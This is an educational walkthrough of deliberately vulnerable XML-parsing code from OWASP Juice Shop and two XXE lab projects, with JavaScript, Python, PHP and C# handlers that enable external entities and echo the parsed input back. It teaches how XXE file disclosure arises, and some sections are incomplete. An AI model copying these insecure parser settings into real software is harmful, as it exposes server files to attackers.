The source code examples below come from vulnerable web applications such as OWASP Juice Shop.
Most XML libraries disable external DTD now by default, most of the illustrations below enable this to illustrate the vulnerability.
The XXE-Study contains Python, PHP and Java examples using parsers in each language.
The XXE-Lab contains C#, Java and Python examples using built in XML classes in each language.
OWASP Juice Shop
Juice Shop contains XXE vulnerability in the File upload functionality on the endpoint HTTP POST /file-upload. Uploading a XML file with an XXE exploit will trigger XXE file read on this endpoint.
The code below contains the handleXmlUpload function from the FileUpload.js route file. This function turns the file into a string variable on line 5, it creates a sandbox on line 7 for the xml to be parsed in. It creates the xmlDoc variable from the parsed user input on line 9, the code parses the input using libxml (node.js module) parseXml function. The xmlString variable is created from the xmlDoc variable. The xmlString variable is used on 13 which returns an error message with the xmlString concatenated.
function handleXmlUpload ({ file }, res, next) {
if (utils.endsWith(file.originalname.toLowerCase(), '.xml')) {
utils.solveIf(challenges.deprecatedInterfaceChallenge, () => { return true })
if (file.buffer && !utils.disableOnContainerEnv()) { // XXE attacks in Docker/Heroku containers regularly cause "segfault" crashes
const data = file.buffer.toString()
try {
const sandbox = { libxml, data }
vm.createContext(sandbox)
const xmlDoc = vm.runInContext('libxml.parseXml(data, { noblanks: true, noent: true, nocdata: true })', sandbox, { timeout: 2000 })
const xmlString = xmlDoc.toString(false)
utils.solveIf(challenges.xxeFileDisclosureChallenge, () => { return (matchesSystemIniFile(xmlString) || matchesEtcPasswdFile(xmlString)) })
res.status(410)
next(new Error('B2B customer complaints via file upload have been deprecated for security reasons: ' + utils.trunc(xmlString, 400) + ' (' + file.originalname + ')'))
} catch (err) {
if (utils.contains(err.message, 'Script execution timed out')) {
if (utils.notSolved(challenges.xxeDosChallenge)) {
utils.solve(challenges.xxeDosChallenge)
}
res.status(503)
next(new Error('Sorry, we are temporarily not available! Please try again later.'))
} else {
res.status(410)
next(new Error('B2B customer complaints via file upload have been deprecated for security reasons: ' + err.message + ' (' + file.originalname + ')'))
}
}
} else {
res.status(410)
next(new Error('B2B customer complaints via file upload have been deprecated for security reasons (' + file.originalname + ')'))
}
}
res.status(204).end()
}
Thus when uploading an XXE file read exploit, the above code will run and return the truncated file in the error message.
XXE-Study
HLOverflow provided a lab with 3 XXE examples in Python, PHP and Java. We will review them below. These applications are only a login form which triggers XXE, there is no other functionality.
XXE-Study Python
The Python XXE example uses the eTree / lxml parser.
This code handles the /xml route for HTTP POST and GET methods. On line 12 it checks the HTTP Method, if POST it creates a variable 'xml' and sets its value to the contents of the HTTP POST request form 'xml' parameter. The parser is created on line 14 with network connectivity set to false (this will disable SSRF attacks). Line 16 uses eTree's from string function to parse the xml input and creates a parsed_xml variable from it.
//app.py https://github.com/HLOverflow/XXE-study/blob/master/Apps/Python-flask-xxe/vulnserver/src/app.py
app.route('/xml', methods=['POST', 'GET'])
def xml():
parsed_xml = None
errormsg = ''
html = """
<html>
<body>
"""
if request.method == 'POST':
xml = request.form['xml']
parser = etree.XMLParser(no_network=False) # to enable network entity. see xmlparser-info.txt
try:
doc = etree.fromstring(str(xml), parser)
parsed_xml = etree.tostring(doc)
print repr(parsed_xml)
except:
print "Cannot parse the xml"
html += "Error:\n<br>\n" + traceback.format_exc()
if (parsed_xml):
html += "Result:\n<br>\n" + cgi.escape(parsed_xml)
else:
html += """
<form action = "/xml" method = "POST">
<p><h3>Enter xml to parse</h3></p>
<textarea class="input" name="xml" cols="40" rows="5"></textarea>
<p><input type = 'submit' value = 'Parse'/></p>
</form>
"""
html += """
</body>
</html>
"""
return html
XXE-Study PHP
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$info = simplexml_import_dom($dom);
$name = $info->name;
$password = $info->password;
echo "Sorry, this $name not available!";
?>
XXE-Study Java
XXE-Lab
XXE-Lab contains XXE exploits without the use of standard XML parser libraries.
XXE-Lab Python
The Python code uses the Python xml.dom.minidom class:
xml.dom.minidom is a minimal implementation of the Document Object Model interface, with an API similar to that in other languages. It is intended to be simpler than the full DOM and also significantly smaller.
Warning
The xml.dom.minidom module is not secure against maliciously constructed data. If you need to parse untrusted or unauthenticated data see XML vulnerabilities.
DOM applications typically start by parsing some XML into a DOM. With xml.dom.minidom, this is done through the parse functions
The doLogin function uses the minidom.ParseString() to take the request input, parse it and converts it to a DOMTree object. Lines 15-18 uses the DOMTree to extract the username and password.
Defines the API to obtain DOM Document instances from an XML document. Using this class, an application programmer can obtain a Document from XML.
The LoginServlet class doGet function creates a DocumentBuilder object and on line 16 uses the DocumentBuilder parse function to parse the XML input stream and create a new DOM Document object. Then the username and password are retrieved, checked and saved to the result string object.
The C# code uses the System.xml.xmldocument class:
Represents an XML document. You can use this class to load, validate, edit, add, and position XML in a document.
doLogin function in the LoginController class takes the HTTP POST request and uses StreamReader constructed on line 30 to read the characters from a byte stream in line 31 using reader.ReadToEnd(). A new XML document is created on line 32, doc.LoadXml(xmlData) function takes the xmlData String variable as an argument and loads the XML document with the string.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Web;
using System.Web.Mvc;
using System.Xml;
namespace Csharp_xxe.Controllers
{
public class LoginController : Controller
{
private static string USERNAME = "admin";
private static string PASSWORD = "admin";
// GET: Login
public ActionResult Index()
{
return View();
}
public void doLogin()
{
string result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>",null,null);
if (Request.RequestType == "POST")
{
try
{
//接收并读取POST过来的XML文件流
StreamReader reader = new StreamReader(Request.InputStream);
String xmlData = reader.ReadToEnd();
var doc = new XmlDocument();
doc.LoadXml(xmlData);
XmlElement xRoot = doc.DocumentElement;
XmlNode uNode = xRoot.GetElementsByTagName("username")[0];
XmlNode pNode = xRoot.GetElementsByTagName("password")[0];
string username = uNode.InnerText;
string password = pNode.InnerText;
if (username.Equals(USERNAME) && password.Equals(PASSWORD))
{
result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 1, username);
}
else
{
result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 0, username);
}
}
catch (ArgumentException e1)
{
result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 3, e1);
}
catch (XmlException e2)
{
result = String.Format("<result><code>{0}</code><msg>{1}</msg></result>", 3, e2);
}
finally
{
Response.ContentType = "text/xml; charset=utf-8";
Response.Write(result);
}
}
}
}
}